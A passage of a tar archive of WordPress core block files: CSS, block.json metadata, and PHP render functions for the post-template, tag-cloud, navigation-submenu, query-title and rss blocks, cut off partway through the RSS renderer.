}pullquote/style.min.css000060400000002032151330427370011230 0ustar00.wp-block-pullquote{box-sizing:border-box;margin:0 0 1em;overflow-wrap:break-word;padding:4em 0;text-align:center}.wp-block-pullquote blockquote,.wp-block-pullquote cite,.wp-block-pullquote p{color:inherit}.wp-block-pullquote blockquote{margin:0}.wp-block-pullquote p{margin-top:0}.wp-block-pullquote p:last-child{margin-bottom:0}.wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{max-width:420px}.wp-block-pullquote cite,.wp-block-pullquote footer{position:relative}.wp-block-pullquote .has-text-color a{color:inherit}.wp-block-pullquote.has-text-align-left blockquote{text-align:left}.wp-block-pullquote.has-text-align-right blockquote{text-align:right}.wp-block-pullquote.is-style-solid-color{border:none}.wp-block-pullquote.is-style-solid-color blockquote{margin-left:auto;margin-right:auto;max-width:60%}.wp-block-pullquote.is-style-solid-color blockquote p{font-size:2em;margin-bottom:0;margin-top:0}.wp-block-pullquote.is-style-solid-color blockquote cite{font-style:normal;text-transform:none}.wp-block-pullquote cite{color:inherit}pullquote/editor-rtl.min.css000060400000000362151330427370012161 0ustar00.wp-block-pullquote.is-style-solid-color blockquote p{font-size:32px}.wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation{font-style:normal;text-transform:none}.wp-block-pullquote .wp-block-pullquote__citation{color:inherit}pullquote/style.css000060400000002222151330427370010447 0ustar00.wp-block-pullquote{
  box-sizing:border-box;
  margin:0 0 1em;
  overflow-wrap:break-word;
  padding:4em 0;
  text-align:center;
}
.wp-block-pullquote blockquote,.wp-block-pullquote cite,.wp-block-pullquote p{
  color:inherit;
}
.wp-block-pullquote blockquote{
  margin:0;
}
.wp-block-pullquote p{
  margin-top:0;
}
.wp-block-pullquote p:last-child{
  margin-bottom:0;
}
.wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{
  max-width:420px;
}
.wp-block-pullquote cite,.wp-block-pullquote footer{
  position:relative;
}
.wp-block-pullquote .has-text-color a{
  color:inherit;
}

.wp-block-pullquote.has-text-align-left blockquote{
  text-align:left;
}

.wp-block-pullquote.has-text-align-right blockquote{
  text-align:right;
}

.wp-block-pullquote.is-style-solid-color{
  border:none;
}
.wp-block-pullquote.is-style-solid-color blockquote{
  margin-left:auto;
  margin-right:auto;
  max-width:60%;
}
.wp-block-pullquote.is-style-solid-color blockquote p{
  font-size:2em;
  margin-bottom:0;
  margin-top:0;
}
.wp-block-pullquote.is-style-solid-color blockquote cite{
  font-style:normal;
  text-transform:none;
}

.wp-block-pullquote cite{
  color:inherit;
}post-template.php000060400000013165151330427370010062 0ustar00<?php
/**
 * Server-side rendering of the `core/post-template` block.
 *
 * @package WordPress
 */

/**
 * Determines whether a block list contains a block that uses the featured image.
 *
 * @since 6.0.0
 *
 * @param WP_Block_List $inner_blocks Inner block instance.
 *
 * @return bool Whether the block list contains a block that uses the featured image.
 */
function block_core_post_template_uses_featured_image( $inner_blocks ) {
	foreach ( $inner_blocks as $block ) {
		if ( 'core/post-featured-image' === $block->name ) {
			return true;
		}
		if (
			'core/cover' === $block->name &&
			! empty( $block->attributes['useFeaturedImage'] )
		) {
			return true;
		}
		if ( $block->inner_blocks && block_core_post_template_uses_featured_image( $block->inner_blocks ) ) {
			return true;
		}
	}

	return false;
}

/**
 * Renders the `core/post-template` block on the server.
 *
 * @since 6.3.0 Changed render_block_context priority to `1`.
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the output of the query, structured using the layout defined by the block's inner blocks.
 */
function render_block_core_post_template( $attributes, $content, $block ) {
	$page_key            = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page';
	$enhanced_pagination = isset( $block->context['enhancedPagination'] ) && $block->context['enhancedPagination'];
	$page                = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ];

	// Use global query if needed.
	$use_global_query = ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] );
	if ( $use_global_query ) {
		global $wp_query;

		/*
		 * If already in the main query loop, duplicate the query instance to not tamper with the main instance.
		 * Since this is a nested query, it should start at the beginning, therefore rewind posts.
		 * Otherwise, the main query loop has not started yet and this block is responsible for doing so.
		 */
		if ( in_the_loop() ) {
			$query = clone $wp_query;
			$query->rewind_posts();
		} else {
			$query = $wp_query;
		}
	} else {
		$query_args = build_query_vars_from_query_block( $block, $page );
		$query      = new WP_Query( $query_args );
	}

	if ( ! $query->have_posts() ) {
		return '';
	}

	if ( block_core_post_template_uses_featured_image( $block->inner_blocks ) ) {
		update_post_thumbnail_cache( $query );
	}

	$classnames = '';
	if ( isset( $block->context['displayLayout'] ) && isset( $block->context['query'] ) ) {
		if ( isset( $block->context['displayLayout']['type'] ) && 'flex' === $block->context['displayLayout']['type'] ) {
			$classnames = "is-flex-container columns-{$block->context['displayLayout']['columns']}";
		}
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classnames .= ' has-link-color';
	}

	// Ensure backwards compatibility by flagging the number of columns via classname when using grid layout.
	if ( isset( $attributes['layout']['type'] ) && 'grid' === $attributes['layout']['type'] && ! empty( $attributes['layout']['columnCount'] ) ) {
		$classnames .= ' ' . sanitize_title( 'columns-' . $attributes['layout']['columnCount'] );
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => trim( $classnames ) ) );

	$content = '';
	while ( $query->have_posts() ) {
		$query->the_post();

		// Get an instance of the current Post Template block.
		$block_instance = $block->parsed_block;

		// Set the block name to one that does not correspond to an existing registered block.
		// This ensures that for the inner instances of the Post Template block, we do not render any block supports.
		$block_instance['blockName'] = 'core/null';

		$post_id              = get_the_ID();
		$post_type            = get_post_type();
		$filter_block_context = static function ( $context ) use ( $post_id, $post_type ) {
			$context['postType'] = $post_type;
			$context['postId']   = $post_id;
			return $context;
		};

		// Use an early priority to so that other 'render_block_context' filters have access to the values.
		add_filter( 'render_block_context', $filter_block_context, 1 );
		// Render the inner blocks of the Post Template block with `dynamic` set to `false` to prevent calling
		// `render_callback` and ensure that no wrapper markup is included.
		$block_content = ( new WP_Block( $block_instance ) )->render( array( 'dynamic' => false ) );
		remove_filter( 'render_block_context', $filter_block_context, 1 );

		// Wrap the render inner blocks in a `li` element with the appropriate post classes.
		$post_classes = implode( ' ', get_post_class( 'wp-block-post' ) );

		$inner_block_directives = $enhanced_pagination ? ' data-wp-key="post-template-item-' . $post_id . '"' : '';

		$content .= '<li' . $inner_block_directives . ' class="' . esc_attr( $post_classes ) . '">' . $block_content . '</li>';
	}

	/*
	 * Use this function to restore the context of the template tags
	 * from a secondary query loop back to the main query loop.
	 * Since we use two custom loops, it's safest to always restore.
	*/
	wp_reset_postdata();

	return sprintf(
		'<ul %1$s>%2$s</ul>',
		$wrapper_attributes,
		$content
	);
}

/**
 * Registers the `core/post-template` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_post_template() {
	register_block_type_from_metadata(
		__DIR__ . '/post-template',
		array(
			'render_callback'   => 'render_block_core_post_template',
			'skip_inner_blocks' => true,
		)
	);
}
add_action( 'init', 'register_block_core_post_template' );
tag-cloud.php000060400000002641151330427370007140 0ustar00<?php
/**
 * Server-side rendering of the `core/tag-cloud` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/tag-cloud` block on server.
 *
 * @since 5.2.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the tag cloud for selected taxonomy.
 */
function render_block_core_tag_cloud( $attributes ) {
	$smallest_font_size = $attributes['smallestFontSize'];
	$unit               = ( preg_match( '/^[0-9.]+(?P<unit>[a-z%]+)$/i', $smallest_font_size, $m ) ? $m['unit'] : 'pt' );

	$args      = array(
		'echo'       => false,
		'unit'       => $unit,
		'taxonomy'   => $attributes['taxonomy'],
		'show_count' => $attributes['showTagCounts'],
		'number'     => $attributes['numberOfTags'],
		'smallest'   => floatVal( $attributes['smallestFontSize'] ),
		'largest'    => floatVal( $attributes['largestFontSize'] ),
	);
	$tag_cloud = wp_tag_cloud( $args );

	if ( ! $tag_cloud ) {
		$tag_cloud = __( 'There&#8217;s no content to show here yet.' );
	}

	$wrapper_attributes = get_block_wrapper_attributes();

	return sprintf(
		'<p %1$s>%2$s</p>',
		$wrapper_attributes,
		$tag_cloud
	);
}

/**
 * Registers the `core/tag-cloud` block on server.
 *
 * @since 5.2.0
 */
function register_block_core_tag_cloud() {
	register_block_type_from_metadata(
		__DIR__ . '/tag-cloud',
		array(
			'render_callback' => 'render_block_core_tag_cloud',
		)
	);
}
add_action( 'init', 'register_block_core_tag_cloud' );
navigation-submenu.php000060400000022131151330427370011070 0ustar00<?php
/**
 * Server-side rendering of the `core/navigation-submenu` block.
 *
 * @package WordPress
 */

/**
 * Build an array with CSS classes and inline styles defining the font sizes
 * which will be applied to the navigation markup in the front-end.
 *
 * @since 5.9.0
 *
 * @param  array $context Navigation block context.
 * @return array Font size CSS classes and inline styles.
 */
function block_core_navigation_submenu_build_css_font_sizes( $context ) {
	// CSS classes.
	$font_sizes = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	$has_named_font_size  = array_key_exists( 'fontSize', $context );
	$has_custom_font_size = isset( $context['style']['typography']['fontSize'] );

	if ( $has_named_font_size ) {
		// Add the font size class.
		$font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] );
	} elseif ( $has_custom_font_size ) {
		// Add the custom font size inline style.
		$font_sizes['inline_styles'] = sprintf(
			'font-size: %s;',
			wp_get_typography_font_size_value(
				array(
					'size' => $context['style']['typography']['fontSize'],
				)
			)
		);
	}

	return $font_sizes;
}

/**
 * Returns the top-level submenu SVG chevron icon.
 *
 * @since 5.9.0
 *
 * @return string
 */
function block_core_navigation_submenu_render_submenu_icon() {
	return '<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12" fill="none" aria-hidden="true" focusable="false"><path d="M1.50002 4L6.00002 8L10.5 4" stroke-width="1.5"></path></svg>';
}

/**
 * Renders the `core/navigation-submenu` block.
 *
 * @since 5.9.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The saved content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string Returns the post content with the legacy widget added.
 */
function render_block_core_navigation_submenu( $attributes, $content, $block ) {
	$navigation_link_has_id = isset( $attributes['id'] ) && is_numeric( $attributes['id'] );
	$is_post_type           = isset( $attributes['kind'] ) && 'post-type' === $attributes['kind'];
	$is_post_type           = $is_post_type || isset( $attributes['type'] ) && ( 'post' === $attributes['type'] || 'page' === $attributes['type'] );

	// Don't render the block's subtree if it is a draft.
	if ( $is_post_type && $navigation_link_has_id && 'publish' !== get_post_status( $attributes['id'] ) ) {
		return '';
	}

	// Don't render the block's subtree if it has no label.
	if ( empty( $attributes['label'] ) ) {
		return '';
	}

	$font_sizes      = block_core_navigation_submenu_build_css_font_sizes( $block->context );
	$style_attribute = $font_sizes['inline_styles'];

	$css_classes = trim( implode( ' ', $font_sizes['css_classes'] ) );
	$has_submenu = count( $block->inner_blocks ) > 0;
	$kind        = empty( $attributes['kind'] ) ? 'post_type' : str_replace( '-', '_', $attributes['kind'] );
	$is_active   = ! empty( $attributes['id'] ) && get_queried_object_id() === (int) $attributes['id'] && ! empty( get_queried_object()->$kind );

	if ( is_post_type_archive() ) {
		$queried_archive_link = get_post_type_archive_link( get_queried_object()->name );
		if ( $attributes['url'] === $queried_archive_link ) {
			$is_active = true;
		}
	}

	$show_submenu_indicators = isset( $block->context['showSubmenuIcon'] ) && $block->context['showSubmenuIcon'];
	$open_on_click           = isset( $block->context['openSubmenusOnClick'] ) && $block->context['openSubmenusOnClick'];
	$open_on_hover_and_click = isset( $block->context['openSubmenusOnClick'] ) && ! $block->context['openSubmenusOnClick'] &&
		$show_submenu_indicators;

	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'class' => $css_classes . ' wp-block-navigation-item' . ( $has_submenu ? ' has-child' : '' ) .
			( $open_on_click ? ' open-on-click' : '' ) . ( $open_on_hover_and_click ? ' open-on-hover-click' : '' ) .
			( $is_active ? ' current-menu-item' : '' ),
			'style' => $style_attribute,
		)
	);

	$label = '';

	if ( isset( $attributes['label'] ) ) {
		$label .= wp_kses_post( $attributes['label'] );
	}

	$aria_label = sprintf(
		/* translators: Accessibility text. %s: Parent page title. */
		__( '%s submenu' ),
		wp_strip_all_tags( $label )
	);

	$html = '<li ' . $wrapper_attributes . '>';

	// If Submenus open on hover, we render an anchor tag with attributes.
	// If submenu icons are set to show, we also render a submenu button, so the submenu can be opened on click.
	if ( ! $open_on_click ) {
		$item_url = isset( $attributes['url'] ) ? $attributes['url'] : '';
		// Start appending HTML attributes to anchor tag.
		$html .= '<a class="wp-block-navigation-item__content"';

		// The href attribute on a and area elements is not required;
		// when those elements do not have href attributes they do not create hyperlinks.
		// But also The href attribute must have a value that is a valid URL potentially
		// surrounded by spaces.
		// see: https://html.spec.whatwg.org/multipage/links.html#links-created-by-a-and-area-elements.
		if ( ! empty( $item_url ) ) {
			$html .= ' href="' . esc_url( $item_url ) . '"';
		}

		if ( $is_active ) {
			$html .= ' aria-current="page"';
		}

		if ( isset( $attributes['opensInNewTab'] ) && true === $attributes['opensInNewTab'] ) {
			$html .= ' target="_blank"  ';
		}

		if ( isset( $attributes['rel'] ) ) {
			$html .= ' rel="' . esc_attr( $attributes['rel'] ) . '"';
		} elseif ( isset( $attributes['nofollow'] ) && $attributes['nofollow'] ) {
			$html .= ' rel="nofollow"';
		}

		if ( isset( $attributes['title'] ) ) {
			$html .= ' title="' . esc_attr( $attributes['title'] ) . '"';
		}

		$html .= '>';
		// End appending HTML attributes to anchor tag.

		$html .= $label;

		$html .= '</a>';
		// End anchor tag content.

		if ( $show_submenu_indicators ) {
			// The submenu icon is rendered in a button here
			// so that there's a clickable element to open the submenu.
			$html .= '<button aria-label="' . esc_attr( $aria_label ) . '" class="wp-block-navigation__submenu-icon wp-block-navigation-submenu__toggle" aria-expanded="false">' . block_core_navigation_submenu_render_submenu_icon() . '</button>';
		}
	} else {
		// If menus open on click, we render the parent as a button.
		$html .= '<button aria-label="' . esc_attr( $aria_label ) . '" class="wp-block-navigation-item__content wp-block-navigation-submenu__toggle" aria-expanded="false">';

		// Wrap title with span to isolate it from submenu icon.
		$html .= '<span class="wp-block-navigation-item__label">';

		$html .= $label;

		$html .= '</span>';

		$html .= '</button>';

		$html .= '<span class="wp-block-navigation__submenu-icon">' . block_core_navigation_submenu_render_submenu_icon() . '</span>';

	}

	if ( $has_submenu ) {
		// Copy some attributes from the parent block to this one.
		// Ideally this would happen in the client when the block is created.
		if ( array_key_exists( 'overlayTextColor', $block->context ) ) {
			$attributes['textColor'] = $block->context['overlayTextColor'];
		}
		if ( array_key_exists( 'overlayBackgroundColor', $block->context ) ) {
			$attributes['backgroundColor'] = $block->context['overlayBackgroundColor'];
		}
		if ( array_key_exists( 'customOverlayTextColor', $block->context ) ) {
			$attributes['style']['color']['text'] = $block->context['customOverlayTextColor'];
		}
		if ( array_key_exists( 'customOverlayBackgroundColor', $block->context ) ) {
			$attributes['style']['color']['background'] = $block->context['customOverlayBackgroundColor'];
		}

		// This allows us to be able to get a response from wp_apply_colors_support.
		$block->block_type->supports['color'] = true;
		$colors_supports                      = wp_apply_colors_support( $block->block_type, $attributes );
		$css_classes                          = 'wp-block-navigation__submenu-container';
		if ( array_key_exists( 'class', $colors_supports ) ) {
			$css_classes .= ' ' . $colors_supports['class'];
		}

		$style_attribute = '';
		if ( array_key_exists( 'style', $colors_supports ) ) {
			$style_attribute = $colors_supports['style'];
		}

		$inner_blocks_html = '';
		foreach ( $block->inner_blocks as $inner_block ) {
			$inner_blocks_html .= $inner_block->render();
		}

		if ( strpos( $inner_blocks_html, 'current-menu-item' ) ) {
			$tag_processor = new WP_HTML_Tag_Processor( $html );
			while ( $tag_processor->next_tag( array( 'class_name' => 'wp-block-navigation-item__content' ) ) ) {
				$tag_processor->add_class( 'current-menu-ancestor' );
			}
			$html = $tag_processor->get_updated_html();
		}

		$wrapper_attributes = get_block_wrapper_attributes(
			array(
				'class' => $css_classes,
				'style' => $style_attribute,
			)
		);

		$html .= sprintf(
			'<ul %s>%s</ul>',
			$wrapper_attributes,
			$inner_blocks_html
		);

	}

	$html .= '</li>';

	return $html;
}

/**
 * Register the navigation submenu block.
 *
 * @since 5.9.0
 *
 * @uses render_block_core_navigation_submenu()
 * @throws WP_Error An WP_Error exception parsing the block definition.
 */
function register_block_core_navigation_submenu() {
	register_block_type_from_metadata(
		__DIR__ . '/navigation-submenu',
		array(
			'render_callback' => 'render_block_core_navigation_submenu',
		)
	);
}
add_action( 'init', 'register_block_core_navigation_submenu' );
post-terms/block.json000060400000002311151330427370010644 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-terms",
	"title": "Post Terms",
	"category": "theme",
	"description": "Post terms.",
	"textdomain": "default",
	"attributes": {
		"term": {
			"type": "string"
		},
		"textAlign": {
			"type": "string"
		},
		"separator": {
			"type": "string",
			"default": ", "
		},
		"prefix": {
			"type": "string",
			"default": ""
		},
		"suffix": {
			"type": "string",
			"default": ""
		}
	},
	"usesContext": [ "postId", "postType" ],
	"supports": {
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-post-terms"
}
post-terms/style.min.css000060400000000165151330427370011320 0ustar00.wp-block-post-terms{box-sizing:border-box}.wp-block-post-terms .wp-block-post-terms__separator{white-space:pre-wrap}post-terms/style-rtl.min.css000060400000000165151330427370012117 0ustar00.wp-block-post-terms{box-sizing:border-box}.wp-block-post-terms .wp-block-post-terms__separator{white-space:pre-wrap}post-terms/style.css000060400000000200151330427370010524 0ustar00.wp-block-post-terms{
  box-sizing:border-box;
}
.wp-block-post-terms .wp-block-post-terms__separator{
  white-space:pre-wrap;
}post-terms/style-rtl.css000060400000000200151330427370011323 0ustar00.wp-block-post-terms{
  box-sizing:border-box;
}
.wp-block-post-terms .wp-block-post-terms__separator{
  white-space:pre-wrap;
}query-title.php000060400000004062151330427370007544 0ustar00<?php
/**
 * Server-side rendering of the `core/query-title` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/query-title` block on the server.
 * For now it only supports Archive title,
 * using queried object information
 *
 * @since 5.8.0
 *
 * @param array $attributes Block attributes.
 *
 * @return string Returns the query title based on the queried object.
 */
function render_block_core_query_title( $attributes ) {
	$type       = isset( $attributes['type'] ) ? $attributes['type'] : null;
	$is_archive = is_archive();
	$is_search  = is_search();
	if ( ! $type ||
		( 'archive' === $type && ! $is_archive ) ||
		( 'search' === $type && ! $is_search )
		) {
		return '';
	}
	$title = '';
	if ( $is_archive ) {
		$show_prefix = isset( $attributes['showPrefix'] ) ? $attributes['showPrefix'] : true;
		if ( ! $show_prefix ) {
			add_filter( 'get_the_archive_title_prefix', '__return_empty_string', 1 );
			$title = get_the_archive_title();
			remove_filter( 'get_the_archive_title_prefix', '__return_empty_string', 1 );
		} else {
			$title = get_the_archive_title();
		}
	}
	if ( $is_search ) {
		$title = __( 'Search results' );

		if ( isset( $attributes['showSearchTerm'] ) && $attributes['showSearchTerm'] ) {
			$title = sprintf(
				/* translators: %s is the search term. */
				__( 'Search results for: "%s"' ),
				get_search_query()
			);
		}
	}

	$tag_name           = isset( $attributes['level'] ) ? 'h' . (int) $attributes['level'] : 'h1';
	$align_class_name   = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}";
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $align_class_name ) );
	return sprintf(
		'<%1$s %2$s>%3$s</%1$s>',
		$tag_name,
		$wrapper_attributes,
		$title
	);
}

/**
 * Registers the `core/query-title` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_query_title() {
	register_block_type_from_metadata(
		__DIR__ . '/query-title',
		array(
			'render_callback' => 'render_block_core_query_title',
		)
	);
}
add_action( 'init', 'register_block_core_query_title' );
post-template/style.css000060400000003164151330427370011221 0ustar00.wp-block-post-template{
  list-style:none;
  margin-bottom:0;
  margin-top:0;
  max-width:100%;
  padding:0;
}
.wp-block-post-template.is-flex-container{
  display:flex;
  flex-direction:row;
  flex-wrap:wrap;
  gap:1.25em;
}
.wp-block-post-template.is-flex-container>li{
  margin:0;
  width:100%;
}
@media (min-width:600px){
  .wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{
    width:calc(50% - .625em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{
    width:calc(33.33333% - .83333em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{
    width:calc(25% - .9375em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{
    width:calc(20% - 1em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{
    width:calc(16.66667% - 1.04167em);
  }
}

@media (max-width:600px){
  .wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{
    grid-template-columns:1fr;
  }
}
.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{
  float:right;
  margin-inline-end:0;
  margin-inline-start:2em;
}

.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{
  float:left;
  margin-inline-end:2em;
  margin-inline-start:0;
}

.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{
  margin-inline-end:auto;
  margin-inline-start:auto;
}post-template/block.json000060400000002530151330427370011330 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-template",
	"title": "Post Template",
	"category": "theme",
	"parent": [ "core/query" ],
	"description": "Contains the block elements used to render a post, like the title, date, featured image, content or excerpt, and more.",
	"textdomain": "default",
	"usesContext": [
		"queryId",
		"query",
		"displayLayout",
		"templateSlug",
		"previewPostType",
		"enhancedPagination"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"align": [ "wide", "full" ],
		"layout": true,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"spacing": {
			"blockGap": {
				"__experimentalDefault": "1.25em"
			},
			"__experimentalDefaultControls": {
				"blockGap": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-post-template",
	"editorStyle": "wp-block-post-template-editor"
}
post-template/style-rtl.css000060400000003164151330427370012020 0ustar00.wp-block-post-template{
  list-style:none;
  margin-bottom:0;
  margin-top:0;
  max-width:100%;
  padding:0;
}
.wp-block-post-template.is-flex-container{
  display:flex;
  flex-direction:row;
  flex-wrap:wrap;
  gap:1.25em;
}
.wp-block-post-template.is-flex-container>li{
  margin:0;
  width:100%;
}
@media (min-width:600px){
  .wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{
    width:calc(50% - .625em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{
    width:calc(33.33333% - .83333em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{
    width:calc(25% - .9375em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{
    width:calc(20% - 1em);
  }
  .wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{
    width:calc(16.66667% - 1.04167em);
  }
}

@media (max-width:600px){
  .wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{
    grid-template-columns:1fr;
  }
}
.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{
  float:left;
  margin-inline-end:0;
  margin-inline-start:2em;
}

.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{
  float:right;
  margin-inline-end:2em;
  margin-inline-start:0;
}

.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{
  margin-inline-end:auto;
  margin-inline-start:auto;
}post-template/style.min.css000060400000002733151330427370012004 0ustar00.wp-block-post-template{list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{float:right;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{float:left;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{margin-inline-end:auto;margin-inline-start:auto}post-template/style-rtl.min.css000060400000002733151330427370012603 0ustar00.wp-block-post-template{list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{float:left;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{float:right;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{margin-inline-end:auto;margin-inline-start:auto}rss.php000060400000007574151330427370006102 0ustar00<?php
/**
 * Server-side rendering of the `core/rss` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/rss` block on server.
 *
 * @since 5.2.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the block content with received rss items.
 */
function render_block_core_rss( $attributes ) {
	if ( in_array( untrailingslashit( $attributes['feedURL'] ), array( site_url(), home_url() ), true ) ) {
		return '<div class="components-placeholder"><div class="notice notice-error">' . __( 'Adding an RSS feed to this site’s homepage is not supported, as it could lead to a loop that slows down your site. Try using another block, like the <strong>Latest Posts</strong> block, to list posts from the site.' ) . '</div></div>';
	}

	$rss = fetch_feed( $attributes['feedURL'] );

	if ( is_wp_error( $rss ) ) {
		return '<div class="components-placeholder"><div class="notice notice-error"><strong>' . __( 'RSS Error:' ) . '</strong> ' . esc_html( $rss->get_error_message() ) . '</div></div>';
	}

	if ( ! $rss->get_item_quantity() ) {
		return '<div class="components-placeholder"><div class="notice notice-error">' . __( 'An error has occurred, which probably means the feed is down. Try again later.' ) . '</div></div>';
	}

	$rss_items  = $rss->get_items( 0, $attributes['itemsToShow'] );
	$list_items = '';
	foreach ( $rss_items as $item ) {
		$title = esc_html( trim( strip_tags( $item->get_title() ) ) );
		if ( empty( $title ) ) {
			$title = __( '(no title)' );
		}
		$link = $item->get_link();
		$link = esc_url( $link );
		if ( $link ) {
			$title = "<a href='{$link}'>{$title}</a>";
		}
		$title = "<div class='wp-block-rss__item-title'>{$title}</div>";

		$date = '';
		if ( $attributes['displayDate'] ) {
			$date = $item->get_date( 'U' );

			if ( $date ) {
				$date = sprintf(
					'<time datetime="%1$s" class="wp-block-rss__item-publish-date">%2$s</time> ',
					esc_attr( date_i18n( 'c', $date ) ),
					esc_attr( date_i18n( get_option( 'date_format' ), $date ) )
				);
			}
		}

		$author = '';
		if ( $attributes['displayAuthor'] ) {
			$author = $item->get_author();
			if ( is_object( $author ) ) {
